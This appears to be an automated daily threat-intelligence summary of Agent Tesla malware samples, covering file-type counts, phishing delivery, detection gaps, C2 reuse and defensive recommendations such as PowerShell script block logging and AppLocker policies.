Daily Summary
Agent Tesla activity surged today with 74 new samples, a 29% increase over the 7-day average of 58. This marks the highest single-day volume in the past week, suggesting an ongoing campaign push. The rise is driven primarily by PowerShell-based delivery, a shift from the more typical .exe heavy distribution.
New Samples Detected
PowerShell scripts (.ps1) dominate today’s collection, accounting for 33 of the 74 samples (45%). Executables (.exe) follow at 15, with JavaScript (.js) at 13 and batch files (.bat) at 6. Notably, compressed archives (.tar) and HTA files appear as minor outliers at 1 each. The emphasis on script-based loaders suggests attackers are leveraging fileless techniques to bypass static detection, with .ps1 files likely serving as droppers for the final Agent Tesla payload.
Distribution Methods
Distribution appears to rely heavily on email phishing campaigns, as inferred from the file type mix. PowerShell scripts and JavaScript files are common attachments in malspam, often disguised as invoices or shipping documents. The presence of .hta and .vbs files aligns with known Agent Tesla campaigns using macro-laced documents or embedded scripts. No new C2 servers were identified, indicating attackers may be reusing existing infrastructure.
Detection Rate
Antivirus engines generally detect traditional .exe variants of Agent Tesla well, but the shift toward script-based loaders (especially .ps1 and .js) may lower initial detection rates. Many environment-level defenses lack thorough PowerShell logging, allowing these loaders to execute undetected. SOCs should monitor for suspicious PowerShell execution using Event ID 4104 and script block logging.
C2 Infrastructure
No new C2 servers were recorded today. Existing infrastructure remains active, and the lack of new domains or IPs suggests attackers are rotating known endpoints rather than expanding their footprint. Geographic patterns for C2 hosts were not provided but historically include Russian and Eastern European hosting providers.
7-Day Trend
Today’s 74 samples represent a clear spike above the weekly average of 58, which has been steadily climbing since April 25. Activity is ramping up, likely tied to a coordinated phishing wave targeting logistics and finance sectors.
Security Analysis
Agent Tesla’s pivot to PowerShell-centric delivery is notable, as it aligns with a broader industry trend toward living-off-the-land binaries (LOLBins) to evade detection. This campaign may be reusing obfuscated PowerShell payloads previously seen in QakBot or IcedID operations, suggesting cross-family tool sharing. Defenders should implement AppLocker or WDAC policies to block unauthorized PowerShell execution from non-standard paths, particularly from user-writable directories like %TEMP% or %APPDATA%.